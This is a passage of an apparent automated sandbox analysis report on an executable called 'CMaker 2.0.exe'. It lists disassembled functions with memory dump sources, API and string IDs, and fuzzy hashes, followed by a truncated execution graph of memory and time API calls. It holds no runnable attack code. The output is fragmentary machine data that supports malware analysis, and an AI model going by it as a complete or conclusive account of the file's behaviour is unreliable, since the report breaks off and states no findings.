                                                                                                                                                                                  • Associated: 00000005.00000002.2264373753.00007FFD9364D000.00000040.00000001.01000000.00000012.sdmpDownload File
                                                                                                                                                                                  • Associated: 00000005.00000002.2264373753.00007FFD93658000.00000040.00000001.01000000.00000012.sdmpDownload File
                                                                                                                                                                                  • Associated: 00000005.00000002.2264373753.00007FFD93663000.00000040.00000001.01000000.00000012.sdmpDownload File
                                                                                                                                                                                  • Associated: 00000005.00000002.2264633569.00007FFD93667000.00000080.00000001.01000000.00000012.sdmpDownload File
                                                                                                                                                                                  • Associated: 00000005.00000002.2264772265.00007FFD93668000.00000004.00000001.01000000.00000012.sdmpDownload File
                                                                                                                                                                                  Joe Sandbox IDA Plugin
                                                                                                                                                                                  • Snapshot File: hcaresult_5_2_7ffd935a0000_CMaker 2.jbxd
                                                                                                                                                                                  Similarity
                                                                                                                                                                                  • API ID: 00007B22408
                                                                                                                                                                                  • String ID: ..\s\ssl\ssl_sess.c$ssl_get_prev_session
                                                                                                                                                                                  • API String ID: 4199793457-1331951588
                                                                                                                                                                                  • Opcode ID: feee6e66e635408aba00dfce115c2d520f221e3fcdfb8559fea45fb45ed583be
                                                                                                                                                                                  • Instruction ID: 2e0c6d44e466fbf1543e20a2b2ae3e5e64668e12aab790939a64f45cb7364548
                                                                                                                                                                                  • Opcode Fuzzy Hash: feee6e66e635408aba00dfce115c2d520f221e3fcdfb8559fea45fb45ed583be
                                                                                                                                                                                  • Instruction Fuzzy Hash: 83C16E76B0868282EBB6ABA5D4707B97368FB88B8CF144131DE4E67795CF78E544C700
                                                                                                                                                                                  Function 00007FFD935A1EC4 Relevance: 5.4, APIs: 1, Strings: 2, Instructions: 140COMMON
                                                                                                                                                                                  Download Yara Rule
                                                                                                                                                                                  APIs
                                                                                                                                                                                  Strings
                                                                                                                                                                                  Memory Dump Source
                                                                                                                                                                                  • Source File: 00000005.00000002.2264373753.00007FFD935A1000.00000040.00000001.01000000.00000012.sdmp, Offset: 00007FFD935A0000, based on PE: true
                                                                                                                                                                                  • Associated: 00000005.00000002.2264326565.00007FFD935A0000.00000002.00000001.01000000.00000012.sdmpDownload File
                                                                                                                                                                                  • Associated: 00000005.00000002.2264373753.00007FFD93623000.00000040.00000001.01000000.00000012.sdmpDownload File
                                                                                                                                                                                  • Associated: 00000005.00000002.2264373753.00007FFD93625000.00000040.00000001.01000000.00000012.sdmpDownload File
                                                                                                                                                                                  • Associated: 00000005.00000002.2264373753.00007FFD9364D000.00000040.00000001.01000000.00000012.sdmpDownload File
                                                                                                                                                                                  • Associated: 00000005.00000002.2264373753.00007FFD93658000.00000040.00000001.01000000.00000012.sdmpDownload File
                                                                                                                                                                                  • Associated: 00000005.00000002.2264373753.00007FFD93663000.00000040.00000001.01000000.00000012.sdmpDownload File
                                                                                                                                                                                  • Associated: 00000005.00000002.2264633569.00007FFD93667000.00000080.00000001.01000000.00000012.sdmpDownload File
                                                                                                                                                                                  • Associated: 00000005.00000002.2264772265.00007FFD93668000.00000004.00000001.01000000.00000012.sdmpDownload File
                                                                                                                                                                                  Joe Sandbox IDA Plugin
                                                                                                                                                                                  • Snapshot File: hcaresult_5_2_7ffd935a0000_CMaker 2.jbxd
                                                                                                                                                                                  Similarity
                                                                                                                                                                                  • API ID: 00007B2246570
                                                                                                                                                                                  • String ID: ..\s\ssl\d1_srtp.c$ssl_ctx_make_profiles
                                                                                                                                                                                  • API String ID: 511975427-118859582
                                                                                                                                                                                  • Opcode ID: 8335cbb17a8c73553454c38ef3cd25a79fd52b62f38be6b0172fb15f12420188
                                                                                                                                                                                  • Instruction ID: 3423be3ef517c1c1bbc91193eecd6704f86ddc0a7f569a583fb944bc96cfa8b2
                                                                                                                                                                                  • Opcode Fuzzy Hash: 8335cbb17a8c73553454c38ef3cd25a79fd52b62f38be6b0172fb15f12420188
                                                                                                                                                                                  • Instruction Fuzzy Hash: A751F721F0969646FEB29BE1D8603BD529AAF89B80F554031DE0DE77C6EE3CE442D300
                                                                                                                                                                                  Function 00007FF6FAC05A1C Relevance: 5.4, APIs: 2, Strings: 1, Instructions: 121COMMON
                                                                                                                                                                                  Download Yara Rule
                                                                                                                                                                                  APIs
                                                                                                                                                                                  Strings
                                                                                                                                                                                  Memory Dump Source
                                                                                                                                                                                  • Source File: 00000005.00000002.2261013560.00007FF6FABE1000.00000020.00000001.01000000.00000005.sdmp, Offset: 00007FF6FABE0000, based on PE: true
                                                                                                                                                                                  • Associated: 00000005.00000002.2260990879.00007FF6FABE0000.00000002.00000001.01000000.00000005.sdmpDownload File
                                                                                                                                                                                  • Associated: 00000005.00000002.2261040109.00007FF6FAC0B000.00000002.00000001.01000000.00000005.sdmpDownload File
                                                                                                                                                                                  • Associated: 00000005.00000002.2261107873.00007FF6FAC1E000.00000004.00000001.01000000.00000005.sdmpDownload File
                                                                                                                                                                                  • Associated: 00000005.00000002.2261107873.00007FF6FAC23000.00000004.00000001.01000000.00000005.sdmpDownload File
                                                                                                                                                                                  • Associated: 00000005.00000002.2261214815.00007FF6FAC26000.00000002.00000001.01000000.00000005.sdmpDownload File
                                                                                                                                                                                  • Associated: 00000005.00000002.2261214815.00007FF6FAC2D000.00000002.00000001.01000000.00000005.sdmpDownload File
                                                                                                                                                                                  Joe Sandbox IDA Plugin
                                                                                                                                                                                  • Snapshot File: hcaresult_5_2_7ff6fabe0000_CMaker 2.jbxd
                                                                                                                                                                                  Similarity
                                                                                                                                                                                  • API ID: _get_daylight$_invalid_parameter_noinfo
                                                                                                                                                                                  • String ID: ?
                                                                                                                                                                                  • API String ID: 1286766494-1684325040
                                                                                                                                                                                  • Opcode ID: 64f7181257c50ae4d7613155abce06ba6a134164ab1a9db3b193907e2737411a
                                                                                                                                                                                  • Instruction ID: cfa2463eb1a1ebc9c1650b221a5598cd16787d1f4eff9315c97a79a652da1818
                                                                                                                                                                                  • Opcode Fuzzy Hash: 64f7181257c50ae4d7613155abce06ba6a134164ab1a9db3b193907e2737411a
                                                                                                                                                                                  • Instruction Fuzzy Hash: D1412862A0838A47FB248B65944137A6778EB81BA4F14D275EE6CC6AD9FE3CD4818700
                                                                                                                                                                                  Function 00007FF6FABF8BD0 Relevance: 5.4, APIs: 2, Strings: 1, Instructions: 111COMMON
                                                                                                                                                                                  Download Yara Rule
                                                                                                                                                                                  APIs
                                                                                                                                                                                  • _invalid_parameter_noinfo.LIBCMT ref: 00007FF6FABF8C02
                                                                                                                                                                                    • Part of subcall function 00007FF6FABFA0E4: RtlFreeHeap.NTDLL(?,?,?,00007FF6FAC02B22,?,?,?,00007FF6FAC02B5F,?,?,00000000,00007FF6FAC03025,?,?,?,00007FF6FAC02F57), ref: 00007FF6FABFA0FA
                                                                                                                                                                                    • Part of subcall function 00007FF6FABFA0E4: GetLastError.KERNEL32(?,?,?,00007FF6FAC02B22,?,?,?,00007FF6FAC02B5F,?,?,00000000,00007FF6FAC03025,?,?,?,00007FF6FAC02F57), ref: 00007FF6FABFA104
                                                                                                                                                                                  • GetModuleFileNameW.KERNEL32(?,?,?,?,?,00007FF6FABEB005), ref: 00007FF6FABF8C20
                                                                                                                                                                                  Strings
                                                                                                                                                                                  Memory Dump Source
                                                                                                                                                                                  • Source File: 00000005.00000002.2261013560.00007FF6FABE1000.00000020.00000001.01000000.00000005.sdmp, Offset: 00007FF6FABE0000, based on PE: true
                                                                                                                                                                                  • Associated: 00000005.00000002.2260990879.00007FF6FABE0000.00000002.00000001.01000000.00000005.sdmpDownload File
                                                                                                                                                                                  • Associated: 00000005.00000002.2261040109.00007FF6FAC0B000.00000002.00000001.01000000.00000005.sdmpDownload File
                                                                                                                                                                                  • Associated: 00000005.00000002.2261107873.00007FF6FAC1E000.00000004.00000001.01000000.00000005.sdmpDownload File
                                                                                                                                                                                  • Associated: 00000005.00000002.2261107873.00007FF6FAC23000.00000004.00000001.01000000.00000005.sdmpDownload File
                                                                                                                                                                                  • Associated: 00000005.00000002.2261214815.00007FF6FAC26000.00000002.00000001.01000000.00000005.sdmpDownload File
                                                                                                                                                                                  • Associated: 00000005.00000002.2261214815.00007FF6FAC2D000.00000002.00000001.01000000.00000005.sdmpDownload File
                                                                                                                                                                                  Joe Sandbox IDA Plugin
                                                                                                                                                                                  • Snapshot File: hcaresult_5_2_7ff6fabe0000_CMaker 2.jbxd
                                                                                                                                                                                  Similarity
                                                                                                                                                                                  • API ID: ErrorFileFreeHeapLastModuleName_invalid_parameter_noinfo
                                                                                                                                                                                  • String ID: C:\Users\user\AppData\Local\Temp\CMaker 2.0.exe
                                                                                                                                                                                  • API String ID: 3580290477-2216745502
                                                                                                                                                                                  • Opcode ID: 3897955feaaa9912254b388f55b996f76c329d0c77b7651028886ff0d95f410a
                                                                                                                                                                                  • Instruction ID: 36a7fa7b14d781534118eb1034c2535765f297f3acd69d3c8dd0a3e278423487
                                                                                                                                                                                  • Opcode Fuzzy Hash: 3897955feaaa9912254b388f55b996f76c329d0c77b7651028886ff0d95f410a
                                                                                                                                                                                  • Instruction Fuzzy Hash: 8041933AA09B1286EB14DFA5A5400B826A4FF457C4B98907EEA5DC3BC5EF3DE451D300
                                                                                                                                                                                  Function 00007FF6FAC003DC Relevance: 5.4, APIs: 1, Strings: 2, Instructions: 105COMMON
                                                                                                                                                                                  Download Yara Rule
                                                                                                                                                                                  APIs
                                                                                                                                                                                  Strings
                                                                                                                                                                                  Memory Dump Source
                                                                                                                                                                                  • Source File: 00000005.00000002.2261013560.00007FF6FABE1000.00000020.00000001.01000000.00000005.sdmp, Offset: 00007FF6FABE0000, based on PE: true
                                                                                                                                                                                  • Associated: 00000005.00000002.2260990879.00007FF6FABE0000.00000002.00000001.01000000.00000005.sdmpDownload File
                                                                                                                                                                                  • Associated: 00000005.00000002.2261040109.00007FF6FAC0B000.00000002.00000001.01000000.00000005.sdmpDownload File
                                                                                                                                                                                  • Associated: 00000005.00000002.2261107873.00007FF6FAC1E000.00000004.00000001.01000000.00000005.sdmpDownload File
                                                                                                                                                                                  • Associated: 00000005.00000002.2261107873.00007FF6FAC23000.00000004.00000001.01000000.00000005.sdmpDownload File
                                                                                                                                                                                  • Associated: 00000005.00000002.2261214815.00007FF6FAC26000.00000002.00000001.01000000.00000005.sdmpDownload File
                                                                                                                                                                                  • Associated: 00000005.00000002.2261214815.00007FF6FAC2D000.00000002.00000001.01000000.00000005.sdmpDownload File
                                                                                                                                                                                  Joe Sandbox IDA Plugin
                                                                                                                                                                                  • Snapshot File: hcaresult_5_2_7ff6fabe0000_CMaker 2.jbxd
                                                                                                                                                                                  Similarity
                                                                                                                                                                                  • API ID: CurrentDirectory_invalid_parameter_noinfo
                                                                                                                                                                                  • String ID: .$:
                                                                                                                                                                                  • API String ID: 2020911589-4202072812
                                                                                                                                                                                  • Opcode ID: e2a8960fa0c92d631bccc768d851ef3d92cb48757f9f221cbbf1c59083278e06
                                                                                                                                                                                  • Instruction ID: beb4df30e8bc812d13d7fb72c5b811c9d9d9309b51880ec70d989ab4fa2dce3d
                                                                                                                                                                                  • Opcode Fuzzy Hash: e2a8960fa0c92d631bccc768d851ef3d92cb48757f9f221cbbf1c59083278e06
                                                                                                                                                                                  • Instruction Fuzzy Hash: 23418D62F18B1288FB109BF198511FC26B46F05748F9A5079DE2DE7ACAFF389441D314
                                                                                                                                                                                  Function 00007FF6FABFC8B8 Relevance: 5.4, APIs: 2, Strings: 1, Instructions: 100fileCOMMON
                                                                                                                                                                                  Download Yara Rule
                                                                                                                                                                                  APIs
                                                                                                                                                                                  Strings
                                                                                                                                                                                  Memory Dump Source
                                                                                                                                                                                  • Source File: 00000005.00000002.2261013560.00007FF6FABE1000.00000020.00000001.01000000.00000005.sdmp, Offset: 00007FF6FABE0000, based on PE: true
                                                                                                                                                                                  • Associated: 00000005.00000002.2260990879.00007FF6FABE0000.00000002.00000001.01000000.00000005.sdmpDownload File
                                                                                                                                                                                  • Associated: 00000005.00000002.2261040109.00007FF6FAC0B000.00000002.00000001.01000000.00000005.sdmpDownload File
                                                                                                                                                                                  • Associated: 00000005.00000002.2261107873.00007FF6FAC1E000.00000004.00000001.01000000.00000005.sdmpDownload File
                                                                                                                                                                                  • Associated: 00000005.00000002.2261107873.00007FF6FAC23000.00000004.00000001.01000000.00000005.sdmpDownload File
                                                                                                                                                                                  • Associated: 00000005.00000002.2261214815.00007FF6FAC26000.00000002.00000001.01000000.00000005.sdmpDownload File
                                                                                                                                                                                  • Associated: 00000005.00000002.2261214815.00007FF6FAC2D000.00000002.00000001.01000000.00000005.sdmpDownload File
                                                                                                                                                                                  Joe Sandbox IDA Plugin
                                                                                                                                                                                  • Snapshot File: hcaresult_5_2_7ff6fabe0000_CMaker 2.jbxd
                                                                                                                                                                                  Similarity
                                                                                                                                                                                  • API ID: ErrorFileLastWrite
                                                                                                                                                                                  • String ID: U
                                                                                                                                                                                  • API String ID: 442123175-4171548499
                                                                                                                                                                                  • Opcode ID: e788713b5b8835d85b89640d10adf88a63234f8ab00a052097ad5adc3a9f47d8
                                                                                                                                                                                  • Instruction ID: aefef38375c9d439bbdae149e790bdf0e61b48d2cd66cb816b743ce3bdfd6143
                                                                                                                                                                                  • Opcode Fuzzy Hash: e788713b5b8835d85b89640d10adf88a63234f8ab00a052097ad5adc3a9f47d8
                                                                                                                                                                                  • Instruction Fuzzy Hash: FD41B162A18A8182DB20CF65E4443AA67A4FB99794F858135EE5DC7788EF3CD441CB40
                                                                                                                                                                                  Function 00007FFD935CDDC0 Relevance: 5.3, APIs: 1, Strings: 2, Instructions: 89COMMON
                                                                                                                                                                                  Download Yara Rule
                                                                                                                                                                                  Strings
                                                                                                                                                                                  Memory Dump Source
                                                                                                                                                                                  • Source File: 00000005.00000002.2264373753.00007FFD935A1000.00000040.00000001.01000000.00000012.sdmp, Offset: 00007FFD935A0000, based on PE: true
                                                                                                                                                                                  • Associated: 00000005.00000002.2264326565.00007FFD935A0000.00000002.00000001.01000000.00000012.sdmpDownload File
                                                                                                                                                                                  • Associated: 00000005.00000002.2264373753.00007FFD93623000.00000040.00000001.01000000.00000012.sdmpDownload File
                                                                                                                                                                                  • Associated: 00000005.00000002.2264373753.00007FFD93625000.00000040.00000001.01000000.00000012.sdmpDownload File
                                                                                                                                                                                  • Associated: 00000005.00000002.2264373753.00007FFD9364D000.00000040.00000001.01000000.00000012.sdmpDownload File
                                                                                                                                                                                  • Associated: 00000005.00000002.2264373753.00007FFD93658000.00000040.00000001.01000000.00000012.sdmpDownload File
                                                                                                                                                                                  • Associated: 00000005.00000002.2264373753.00007FFD93663000.00000040.00000001.01000000.00000012.sdmpDownload File
                                                                                                                                                                                  • Associated: 00000005.00000002.2264633569.00007FFD93667000.00000080.00000001.01000000.00000012.sdmpDownload File
                                                                                                                                                                                  • Associated: 00000005.00000002.2264772265.00007FFD93668000.00000004.00000001.01000000.00000012.sdmpDownload File
                                                                                                                                                                                  Joe Sandbox IDA Plugin
                                                                                                                                                                                  • Snapshot File: hcaresult_5_2_7ffd935a0000_CMaker 2.jbxd
                                                                                                                                                                                  Similarity
                                                                                                                                                                                  • API ID:
                                                                                                                                                                                  • String ID: ..\s\ssl\ssl_sess.c$SSL_SESSION_new
                                                                                                                                                                                  • API String ID: 0-402823876
                                                                                                                                                                                  • Opcode ID: 3e6586d1590c5e37fe5a7cb55c6f6f0f2fce94f93ce1c7229bf9571863312e5a
                                                                                                                                                                                  • Instruction ID: 7e347300b27b628877a27abebfaed9e67b38050173dbf4e726189983db1308b5
                                                                                                                                                                                  • Opcode Fuzzy Hash: 3e6586d1590c5e37fe5a7cb55c6f6f0f2fce94f93ce1c7229bf9571863312e5a
                                                                                                                                                                                  • Instruction Fuzzy Hash: C641D225B1878282FBA5ABE5C4B07FC22E8FF98744F84403AD90D96796DE3CE140C700
                                                                                                                                                                                  Function 00007FFD935A85B0 Relevance: 5.3, APIs: 2, Strings: 1, Instructions: 68timeCOMMON
                                                                                                                                                                                  Download Yara Rule
                                                                                                                                                                                  APIs
                                                                                                                                                                                  Strings
                                                                                                                                                                                  Memory Dump Source
                                                                                                                                                                                  • Source File: 00000005.00000002.2264373753.00007FFD935A1000.00000040.00000001.01000000.00000012.sdmp, Offset: 00007FFD935A0000, based on PE: true
                                                                                                                                                                                  • Associated: 00000005.00000002.2264326565.00007FFD935A0000.00000002.00000001.01000000.00000012.sdmpDownload File
                                                                                                                                                                                  • Associated: 00000005.00000002.2264373753.00007FFD93623000.00000040.00000001.01000000.00000012.sdmpDownload File
                                                                                                                                                                                  • Associated: 00000005.00000002.2264373753.00007FFD93625000.00000040.00000001.01000000.00000012.sdmpDownload File
                                                                                                                                                                                  • Associated: 00000005.00000002.2264373753.00007FFD9364D000.00000040.00000001.01000000.00000012.sdmpDownload File
                                                                                                                                                                                  • Associated: 00000005.00000002.2264373753.00007FFD93658000.00000040.00000001.01000000.00000012.sdmpDownload File
                                                                                                                                                                                  • Associated: 00000005.00000002.2264373753.00007FFD93663000.00000040.00000001.01000000.00000012.sdmpDownload File
                                                                                                                                                                                  • Associated: 00000005.00000002.2264633569.00007FFD93667000.00000080.00000001.01000000.00000012.sdmpDownload File
                                                                                                                                                                                  • Associated: 00000005.00000002.2264772265.00007FFD93668000.00000004.00000001.01000000.00000012.sdmpDownload File
                                                                                                                                                                                  Joe Sandbox IDA Plugin
                                                                                                                                                                                  • Snapshot File: hcaresult_5_2_7ffd935a0000_CMaker 2.jbxd
                                                                                                                                                                                  Similarity
                                                                                                                                                                                  • API ID: Time$System$File
                                                                                                                                                                                  • String ID: gfff
                                                                                                                                                                                  • API String ID: 2838179519-1553575800
                                                                                                                                                                                  • Opcode ID: 5530e0db4563f3136961ddcacea572fb8f4abfde4476f4fcd83b7edc0dcc1c0e
                                                                                                                                                                                  • Instruction ID: c9b18f8c3b4a2b96abf0bd02bbcca2cd19d5f9d4c31ec108366997e83d48328b
                                                                                                                                                                                  • Opcode Fuzzy Hash: 5530e0db4563f3136961ddcacea572fb8f4abfde4476f4fcd83b7edc0dcc1c0e
                                                                                                                                                                                  • Instruction Fuzzy Hash: FE21C572B0468A85EBA58F69E8203797AE8EB9C794F848035DA4DD7794DE3CD540D700
                                                                                                                                                                                  Function 00007FF6FABFF4B8 Relevance: 5.3, APIs: 2, Strings: 1, Instructions: 66COMMON
                                                                                                                                                                                  Download Yara Rule
                                                                                                                                                                                  APIs
                                                                                                                                                                                  Strings
                                                                                                                                                                                  Memory Dump Source
                                                                                                                                                                                  • Source File: 00000005.00000002.2261013560.00007FF6FABE1000.00000020.00000001.01000000.00000005.sdmp, Offset: 00007FF6FABE0000, based on PE: true
                                                                                                                                                                                  • Associated: 00000005.00000002.2260990879.00007FF6FABE0000.00000002.00000001.01000000.00000005.sdmpDownload File
                                                                                                                                                                                  • Associated: 00000005.00000002.2261040109.00007FF6FAC0B000.00000002.00000001.01000000.00000005.sdmpDownload File
                                                                                                                                                                                  • Associated: 00000005.00000002.2261107873.00007FF6FAC1E000.00000004.00000001.01000000.00000005.sdmpDownload File
                                                                                                                                                                                  • Associated: 00000005.00000002.2261107873.00007FF6FAC23000.00000004.00000001.01000000.00000005.sdmpDownload File
                                                                                                                                                                                  • Associated: 00000005.00000002.2261214815.00007FF6FAC26000.00000002.00000001.01000000.00000005.sdmpDownload File
                                                                                                                                                                                  • Associated: 00000005.00000002.2261214815.00007FF6FAC2D000.00000002.00000001.01000000.00000005.sdmpDownload File
                                                                                                                                                                                  Joe Sandbox IDA Plugin
                                                                                                                                                                                  • Snapshot File: hcaresult_5_2_7ff6fabe0000_CMaker 2.jbxd
                                                                                                                                                                                  Similarity
                                                                                                                                                                                  • API ID: CurrentDirectory
                                                                                                                                                                                  • String ID: :
                                                                                                                                                                                  • API String ID: 1611563598-336475711
                                                                                                                                                                                  • Opcode ID: 52b5438b11414e869825b6acf0631758bdb150c62fb32d815d183be076a3aadc
                                                                                                                                                                                  • Instruction ID: 0ae4c404fa792f52f49901e8d4eec7b4ce1a4221cc8244077f93b4d1f39f11af
                                                                                                                                                                                  • Opcode Fuzzy Hash: 52b5438b11414e869825b6acf0631758bdb150c62fb32d815d183be076a3aadc
                                                                                                                                                                                  • Instruction Fuzzy Hash: E621D076A1868281EB20CF65D04427D63B1FB89B84F898179DAADC36C4EF7CE945CB50
                                                                                                                                                                                  Function 00007FF6FABEE178 Relevance: 5.3, APIs: 2, Strings: 1, Instructions: 44COMMON
                                                                                                                                                                                  Download Yara Rule
                                                                                                                                                                                  APIs
                                                                                                                                                                                  Strings
                                                                                                                                                                                  Memory Dump Source
                                                                                                                                                                                  • Source File: 00000005.00000002.2261013560.00007FF6FABE1000.00000020.00000001.01000000.00000005.sdmp, Offset: 00007FF6FABE0000, based on PE: true
                                                                                                                                                                                  • Associated: 00000005.00000002.2260990879.00007FF6FABE0000.00000002.00000001.01000000.00000005.sdmpDownload File
                                                                                                                                                                                  • Associated: 00000005.00000002.2261040109.00007FF6FAC0B000.00000002.00000001.01000000.00000005.sdmpDownload File
                                                                                                                                                                                  • Associated: 00000005.00000002.2261107873.00007FF6FAC1E000.00000004.00000001.01000000.00000005.sdmpDownload File
                                                                                                                                                                                  • Associated: 00000005.00000002.2261107873.00007FF6FAC23000.00000004.00000001.01000000.00000005.sdmpDownload File
                                                                                                                                                                                  • Associated: 00000005.00000002.2261214815.00007FF6FAC26000.00000002.00000001.01000000.00000005.sdmpDownload File
                                                                                                                                                                                  • Associated: 00000005.00000002.2261214815.00007FF6FAC2D000.00000002.00000001.01000000.00000005.sdmpDownload File
                                                                                                                                                                                  Joe Sandbox IDA Plugin
                                                                                                                                                                                  • Snapshot File: hcaresult_5_2_7ff6fabe0000_CMaker 2.jbxd
                                                                                                                                                                                  Similarity
                                                                                                                                                                                  • API ID: ExceptionFileHeaderRaise
                                                                                                                                                                                  • String ID: csm
                                                                                                                                                                                  • API String ID: 2573137834-1018135373
                                                                                                                                                                                  • Opcode ID: 712c94e0b71dfeb4192b1cdcdfcedba21e043517165edae9774edb0317bea208
                                                                                                                                                                                  • Instruction ID: fbe67153f4002d970dd205161bf6df02589c3b1ee225cb0250aaa652519e4b00
                                                                                                                                                                                  • Opcode Fuzzy Hash: 712c94e0b71dfeb4192b1cdcdfcedba21e043517165edae9774edb0317bea208
                                                                                                                                                                                  • Instruction Fuzzy Hash: 07113D32618B8582EB218F15F44026977E5FB89B94F5882B0EF9D877A4EF7CD591CB00
                                                                                                                                                                                  Function 00007FF6FAC00548 Relevance: 5.3, APIs: 2, Strings: 1, Instructions: 36COMMON
                                                                                                                                                                                  Download Yara Rule
                                                                                                                                                                                  APIs
                                                                                                                                                                                  Strings
                                                                                                                                                                                  Memory Dump Source
                                                                                                                                                                                  • Source File: 00000005.00000002.2261013560.00007FF6FABE1000.00000020.00000001.01000000.00000005.sdmp, Offset: 00007FF6FABE0000, based on PE: true
                                                                                                                                                                                  • Associated: 00000005.00000002.2260990879.00007FF6FABE0000.00000002.00000001.01000000.00000005.sdmpDownload File
                                                                                                                                                                                  • Associated: 00000005.00000002.2261040109.00007FF6FAC0B000.00000002.00000001.01000000.00000005.sdmpDownload File
                                                                                                                                                                                  • Associated: 00000005.00000002.2261107873.00007FF6FAC1E000.00000004.00000001.01000000.00000005.sdmpDownload File
                                                                                                                                                                                  • Associated: 00000005.00000002.2261107873.00007FF6FAC23000.00000004.00000001.01000000.00000005.sdmpDownload File
                                                                                                                                                                                  • Associated: 00000005.00000002.2261214815.00007FF6FAC26000.00000002.00000001.01000000.00000005.sdmpDownload File
                                                                                                                                                                                  • Associated: 00000005.00000002.2261214815.00007FF6FAC2D000.00000002.00000001.01000000.00000005.sdmpDownload File
                                                                                                                                                                                  Joe Sandbox IDA Plugin
                                                                                                                                                                                  • Snapshot File: hcaresult_5_2_7ff6fabe0000_CMaker 2.jbxd
                                                                                                                                                                                  Similarity
                                                                                                                                                                                  • API ID: DriveType_invalid_parameter_noinfo
                                                                                                                                                                                  • String ID: :
                                                                                                                                                                                  • API String ID: 2595371189-336475711
                                                                                                                                                                                  • Opcode ID: 7720afce7fc7e91d22e9568d01b70dcbdfe4efe47a81c0f43b4b432c02103839
                                                                                                                                                                                  • Instruction ID: e1c323294f1923bcc1d7599522ec416e0c48527dfaff9124c543c5eabf648324
                                                                                                                                                                                  • Opcode Fuzzy Hash: 7720afce7fc7e91d22e9568d01b70dcbdfe4efe47a81c0f43b4b432c02103839
                                                                                                                                                                                  • Instruction Fuzzy Hash: E1018FA5A1C60286FB30EF60A46127E63B0EF49704FC6A079D56DC66C5FE3CE6049B18
                                                                                                                                                                                  Function 00007FFD935A8FD0 Relevance: 5.3, APIs: 2, Strings: 1, Instructions: 35timeCOMMON
                                                                                                                                                                                  Download Yara Rule
                                                                                                                                                                                  APIs
                                                                                                                                                                                  Strings
                                                                                                                                                                                  Memory Dump Source
                                                                                                                                                                                  • Source File: 00000005.00000002.2264373753.00007FFD935A1000.00000040.00000001.01000000.00000012.sdmp, Offset: 00007FFD935A0000, based on PE: true
                                                                                                                                                                                  • Associated: 00000005.00000002.2264326565.00007FFD935A0000.00000002.00000001.01000000.00000012.sdmpDownload File
                                                                                                                                                                                  • Associated: 00000005.00000002.2264373753.00007FFD93623000.00000040.00000001.01000000.00000012.sdmpDownload File
                                                                                                                                                                                  • Associated: 00000005.00000002.2264373753.00007FFD93625000.00000040.00000001.01000000.00000012.sdmpDownload File
                                                                                                                                                                                  • Associated: 00000005.00000002.2264373753.00007FFD9364D000.00000040.00000001.01000000.00000012.sdmpDownload File
                                                                                                                                                                                  • Associated: 00000005.00000002.2264373753.00007FFD93658000.00000040.00000001.01000000.00000012.sdmpDownload File
                                                                                                                                                                                  • Associated: 00000005.00000002.2264373753.00007FFD93663000.00000040.00000001.01000000.00000012.sdmpDownload File
                                                                                                                                                                                  • Associated: 00000005.00000002.2264633569.00007FFD93667000.00000080.00000001.01000000.00000012.sdmpDownload File
                                                                                                                                                                                  • Associated: 00000005.00000002.2264772265.00007FFD93668000.00000004.00000001.01000000.00000012.sdmpDownload File
                                                                                                                                                                                  Joe Sandbox IDA Plugin
                                                                                                                                                                                  • Snapshot File: hcaresult_5_2_7ffd935a0000_CMaker 2.jbxd
                                                                                                                                                                                  Similarity
                                                                                                                                                                                  • API ID: Time$System$File
                                                                                                                                                                                  • String ID: gfff
                                                                                                                                                                                  • API String ID: 2838179519-1553575800
                                                                                                                                                                                  • Opcode ID: 67d5b2b245d6d65e2ef5cc5c305487d292cfc8c0b311219f02d73a446867e23b
                                                                                                                                                                                  • Instruction ID: 07c5c396400cef2fd1bc761103a496f814b7ef9e053d1348db9ffcc73011a64e
                                                                                                                                                                                  • Opcode Fuzzy Hash: 67d5b2b245d6d65e2ef5cc5c305487d292cfc8c0b311219f02d73a446867e23b
                                                                                                                                                                                  • Instruction Fuzzy Hash: 8F01D6E2B1864582EF60DFA9F81115967A4EBCC798B449032E65ECBB65EE3CD241CB00

                                                                                                                                                                                  Execution Graph

                                                                                                                                                                                  Execution Coverage:9.8%
                                                                                                                                                                                  Dynamic/Decrypted Code Coverage:100%
                                                                                                                                                                                  Signature Coverage:0%
                                                                                                                                                                                  Total number of Nodes:1109
                                                                                                                                                                                  Total number of Limit Nodes:3
                                                                                                                                                                                  execution_graph 10577 1c595cd9 10578 1c595ce0 VirtualProtect 10577->10578 10579 1c595d09 GetLastError 10578->10579 10580 1c595bf0 10578->10580 10579->10580 11211 1c593ed9 11214 1c593e26 _invalid_parameter_noinfo 11211->11214 11212 1c593e90 11213 1c593e76 VirtualQuery 11213->11212 11213->11214 11214->11212 11214->11213 11215 1c593eaa VirtualAlloc 11214->11215 11215->11212 11216 1c593edb GetLastError 11215->11216 11216->11212 11216->11214 10213 1c597c50 10214 1c597c6c 10213->10214 10215 1c597c71 10213->10215 10217 1c597d80 10214->10217 10218 1c597da3 GetSystemTimeAsFileTime GetCurrentThreadId GetCurrentProcessId QueryPerformanceCounter 10217->10218 10219 1c597e17 10217->10219 10218->10219 10219->10215 10644 1c59bd50 10645 1c59bd76 10644->10645 10654 1c59bd8c 10644->10654 10646 1c59b960 _set_errno_from_matherr 13 API calls 10645->10646 10647 1c59bd7b 10646->10647 10649 1c59b840 _invalid_parameter_noinfo 30 API calls 10647->10649 10648 1c59bdf9 10687 1c59a4a0 10648->10687 10650 1c59bd85 10649->10650 10652 1c59bee1 10655 1c59b9f8 __free_lconv_mon 13 API calls 10652->10655 10654->10648 10656 1c59bdec 10654->10656 10665 1c59bf5c 10654->10665 10655->10656 10658 1c59bf22 10656->10658 10659 1c59b9f8 __free_lconv_mon 13 API calls 10656->10659 10657 1c59be6c 10657->10652 10662 1c59bf44 10657->10662 10693 1c59ef30 10657->10693 10660 1c59b9f8 __free_lconv_mon 13 API calls 10658->10660 10659->10656 10660->10650 10663 1c59b860 _invalid_parameter_noinfo 17 API calls 10662->10663 10664 1c59bf58 10663->10664 10666 1c59bf8a 10665->10666 10666->10666 10667 1c59b980 _set_errno_from_matherr 13 API calls 10666->10667 10668 1c59bfd5 10667->10668 10669 1c59ef30 30 API calls 10668->10669 10670 1c59c00b 10669->10670 10671 1c59b860 _invalid_parameter_noinfo 17 API calls 10670->10671 10672 1c59c0e2 10671->10672 10673 1c59ad0c 33 API calls 10672->10673 10674 1c59c1bf 10673->10674 10702 1c59d614 10674->10702 10679 1c59c270 10680 1c59ad0c 33 API calls 10679->10680 10681 1c59c2a3 10680->10681 10682 1c59d614 5 API calls 10681->10682 10683 1c59c2cb 10682->10683 10727 1c59bbc4 10683->10727 10686 1c59bf5c 38 API calls 10688 1c59a4f0 10687->10688 10689 1c59a4b8 10687->10689 10688->10657 10689->10688 10690 1c59b980 _set_errno_from_matherr 13 API calls 10689->10690 10691 1c59a4e6 10690->10691 10692 1c59b9f8 __free_lconv_mon 13 API calls 